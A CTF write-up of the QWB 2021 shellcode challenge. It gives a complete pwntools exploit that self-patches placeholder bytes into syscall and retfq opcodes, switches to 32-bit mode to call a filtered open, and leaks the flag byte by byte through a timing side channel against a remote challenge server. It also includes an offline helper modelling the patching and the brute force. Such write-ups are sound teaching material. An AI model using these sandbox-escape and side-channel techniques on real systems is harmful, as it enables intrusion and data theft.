强网杯 (QWB) 2021 CTF, 强网先锋 track: reproducing the shellcode side-channel attack
Preface: for personal reasons I forgot to take part in this competition, so afterwards I picked a side-channel challenge to reproduce. The challenge runs the shellcode under a sandbox, so the flag is brute-forced one byte at a time through a side channel: the final stage compares a flag byte with a guess and spins forever when they are equal, so a correct guess shows up as a recv timeout while a wrong one ends the connection right away. Rough idea: use retf to switch to 32-bit mode and call the 32-bit open to do open('./flag'), then retfq back into 64-bit mode for the normal read/write. This challenge filters the 64-bit open, hence the 32-bit open; had it filtered write, the 32-bit write would be used the same way. The first stage also never contains the `syscall` or `retfq` opcodes directly; it carries `push rdx; pop rdx` placeholders and xor/subs them into the real opcodes in place before they execute. I will not go through the code line by line since anyone who reads assembly can follow it. The exp below is adapted from another author's exp and is roughly what it looks like; for the syscall numbers see the earlier article on syscall numbers.
exp:
```python
from pwn import *

elf = ELF('./shellcode')


def pwn(io, idx, ch):
    # Stage 2, part 1: runs in 32-bit mode after the far return at the end of
    # stage 1. open("flag") via int 0x80 (i386 syscall 5); the 64-bit open is
    # filtered by the sandbox.
    shellcode_x86 = '''
    /* fp = open("flag") */
    mov esp, 0x40404140
    push 0x67616c66            /* "flag", NUL-terminated by the zeroed mmap page */
    push esp
    pop ebx                    /* ebx = filename */
    xor ecx, ecx               /* ecx = O_RDONLY */
    mov eax, 5                 /* __NR_open on i386 */
    int 0x80
    mov ecx, eax               /* keep the fd; it is rcx after the mode switch */
    '''
    # Stage 2, part 2: in 32-bit mode the bytes `push 0x33 ; push 0x40404089 ;
    # 48 cb` execute as push/push/dec eax/retf, which returns into 64-bit mode
    # (cs = 0x33) right after the retf. Then read the flag onto the stack.
    shellcode_flag = '''
    push 0x33
    push 0x40404089            /* = 0x40404040 + len(32-bit part) + 0x29 NOPs + 9 */
    retfq
    /* read(fp, buf, 0x70) */
    mov rdi, rcx
    mov rsi, rsp
    mov rdx, 0x70
    xor rax, rax
    syscall
    '''
    # The side channel: if flag[idx] == ch the jz loops forever (recv times
    # out); otherwise `ret` pops garbage and the process dies at once.
    # `cmp byte ptr [rsi], imm8` is 3 bytes, with a disp8 it is 4 bytes,
    # hence the different jump-back distance.
    if idx == 0:
        shellcode_flag += "cmp byte ptr [rsi+{0}], {1}; jz $-3; ret".format(idx, ch)
    else:
        shellcode_flag += "cmp byte ptr [rsi+{0}], {1}; jz $-4; ret".format(idx, ch)
    shellcode_x86 = asm(shellcode_x86, arch='i386', os='linux')
    shellcode_flag = asm(shellcode_flag, arch='amd64', os='linux')

    # Stage 1 (64-bit). `push rdx ; pop rdx` (52 5a) is a placeholder that the
    # code xors into `syscall` (0f 05) before reaching it: 0x52^0x5d = 0x0f,
    # 0x5a^0x5f = 0x05. rbx holds the shellcode's base address, so the patched
    # offsets below are relative to it and depend on the exact byte lengths.
    append = '''
    push rdx
    pop rdx
    '''
    shellcode_mmap = '''
    /* mmap(0x40404040, 0x7e, 7, 34, 0, 0) */
    push 0x40404040 /*set rdi*/
    pop rdi
    push 0x7e /*set rsi*/
    pop rsi
    push 0x40 /*set rdx*/
    pop rax
    xor al, 0x47
    push rax
    pop rdx
    push 0x40 /*set r8*/
    pop rax
    xor al, 0x40
    push rax
    pop r8
    push rax /*set r9*/
    pop r9
    /* syscall */
    push rbx
    pop rax
    push 0x5d
    pop rcx
    xor byte ptr [rax+0x31], cl
    push 0x5f
    pop rcx
    xor byte ptr [rax+0x32], cl
    push 0x22 /*set rcx*/
    pop rcx
    push 0x40 /*set rax*/
    pop rax
    xor al, 0x49
    '''
    shellcode_read = '''
    /* read(0, 0x40404040, 0x70) */
    push 0x40404040
    pop rsi
    push 0x40
    pop rax
    xor al, 0x40
    push rax
    pop rdi
    xor al, 0x40
    push 0x70
    pop rdx
    push rbx
    pop rax
    push 0x5d
    pop rcx
    xor byte ptr [rax+0x57], cl
    push 0x5f
    pop rcx
    xor byte ptr [rax+0x58], cl
    push rdx
    pop rax
    xor al, 0x70
    '''
    # Decode the last placeholder into `retfq` (48 cb): 0x52^0x72^0x68 = 0x48,
    # 0x5a-0x47-0x48 = 0xcb. Then far-return to 0x40404040 with cs = 0x23
    # (32-bit code segment).
    shellcode_retfq = '''
    push rbx
    pop rax
    xor al, 0x40
    push 0x72
    pop rcx
    xor byte ptr [rax+0x40], cl
    push 0x68
    pop rcx
    xor byte ptr [rax+0x40], cl
    push 0x47
    pop rcx
    sub byte ptr [rax+0x41], cl
    push 0x48
    pop rcx
    sub byte ptr [rax+0x41], cl
    push rdi
    push rdi
    push 0x23
    push 0x40404040
    pop rax
    push rax
    '''
    shellcode = shellcode_mmap + append + shellcode_read + append + shellcode_retfq + append
    shellcode = asm(shellcode, arch='amd64', os='linux')
    print(hex(len(shellcode)))
    io.sendline(shellcode)
    sleep(0.5)
    # Stage 2 is read() into 0x40404040: 32-bit part, NOP pad up to 0x40
    # bytes, then the 64-bit part.
    io.sendline(shellcode_x86 + 0x29 * b'\x90' + shellcode_flag)


index = 0
a = []
while True:
    for ch in range(0x20, 127):
        # io = process('./chall')
        io = remote('39.105.137.118', 50050)
        pwn(io, index, ch)
        start = time.time()
        try:
            io.recv(timeout=2)
        except Exception:
            pass
        end = time.time()
        io.close()
        if end - start > 1.5:          # stuck in the jz loop: this byte matches
            a.append(ch)
            print("".join(chr(i) for i in a))
            break
    else:
        break                          # no printable byte matched: past the end of the flag
    index += 1
print("".join(chr(i) for i in a))
```

Summary: learned how to brute-force a flag through a side channel.
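Added example (my own helper code, not from the original writeup or the exp it adapts): it models three pieces of the exp so they can be checked offline. First, the stage-1 trick of not emitting `syscall` (0f 05) or `retfq` (48 cb) directly but assembling `push rdx; pop rdx` (52 5a) as a placeholder and xor/sub-ing it into the real opcode at runtime; `xor_chain` and `sub_chain` search for one or two constants that do this, under the assumption (mine, inferred from the constants the exp uses, not stated on the page) that the operands have to be printable ASCII. Second, the hand-encoded bytes of the stage-2 probe, which show why the exp uses `jz $-3` for index 0 and `jz $-4` otherwise. Third, the byte-by-byte timing brute force, run against a constructed flag in place of the remote service.

```python
# Added example, not part of the original exp. Offline model of the exp's
# self-patching placeholders, probe encoding and timing-oracle driver.

PRINTABLE = range(0x21, 0x7f)   # assumption: patch operands must be printable ASCII


def xor_chain(src, dst):
    """Printable constants whose XOR turns byte `src` into `dst` (1 or 2), or None."""
    need = src ^ dst
    if need in PRINTABLE:
        return [need]
    for c1 in PRINTABLE:
        if (need ^ c1) in PRINTABLE:
            return [c1, need ^ c1]
    return None


def sub_chain(src, dst):
    """Printable constants whose SUB turns byte `src` into `dst` (1 or 2), or None."""
    need = (src - dst) & 0xff
    if need in PRINTABLE:
        return [need]
    for c1 in PRINTABLE:
        c2 = (need - c1) & 0xff
        if c2 in PRINTABLE:
            return [c1, c2]
    return None


def apply_patches(code, patches):
    """Simulate the runtime self-patching: patches = [(offset, 'xor'|'sub', const), ...]."""
    buf = bytearray(code)
    for off, op, c in patches:
        if op == 'xor':
            buf[off] ^= c
        else:
            buf[off] = (buf[off] - c) & 0xff
    return bytes(buf)


PLACEHOLDER = b'\x52\x5a'   # push rdx ; pop rdx  (the exp's `append` stub)
SYSCALL = b'\x0f\x05'
RETFQ = b'\x48\xcb'


def probe_bytes(idx, ch):
    """Hand-encode `cmp byte ptr [rsi+idx], ch ; jz <cmp> ; ret`.

    Without a displacement the cmp is 3 bytes (80 /7 ib, modrm 00 111 110 = [rsi]);
    with a disp8 it is 4 bytes (modrm 01 111 110), which is why the exp jumps back
    $-3 for idx 0 and $-4 otherwise.
    """
    assert 0 <= idx <= 0x7f and 0 <= ch <= 0xff
    if idx == 0:
        cmp = bytes([0x80, 0x3e, ch])
    else:
        cmp = bytes([0x80, 0x7e, idx, ch])
    rel = -(len(cmp) + 2)            # jz rel8 is 2 bytes; target is the cmp itself
    return cmp + bytes([0x74, rel & 0xff]) + b'\xc3'


FLAG_SIM = b'flag{constructed_sample_flag}'   # constructed stand-in for ./flag


def oracle_hangs(idx, ch, flag=FLAG_SIM):
    """What the target does with probe_bytes(idx, ch): an equal byte makes the jz
    spin forever (recv times out); otherwise `ret` pops garbage and it dies fast."""
    return idx < len(flag) and flag[idx] == ch


def leak_flag(oracle, maxlen=0x70):
    """Same loop as the exp's driver: one byte at a time over the printable range,
    stopping at the first position where nothing matches (0x00 / 0x0a after the flag)."""
    out = bytearray()
    for idx in range(maxlen):
        for ch in range(0x20, 127):
            if oracle(idx, ch):
                out.append(ch)
                break
        else:
            break
    return bytes(out)
```

The `apply_patches` check with the exp's own constants (0x5d/0x5f for `syscall`, 0x72^0x68 and 0x47+0x48 for `retfq`) confirms the placeholder arithmetic; `xor_chain`/`sub_chain` may return different but equally valid constants when a single printable operand does not exist.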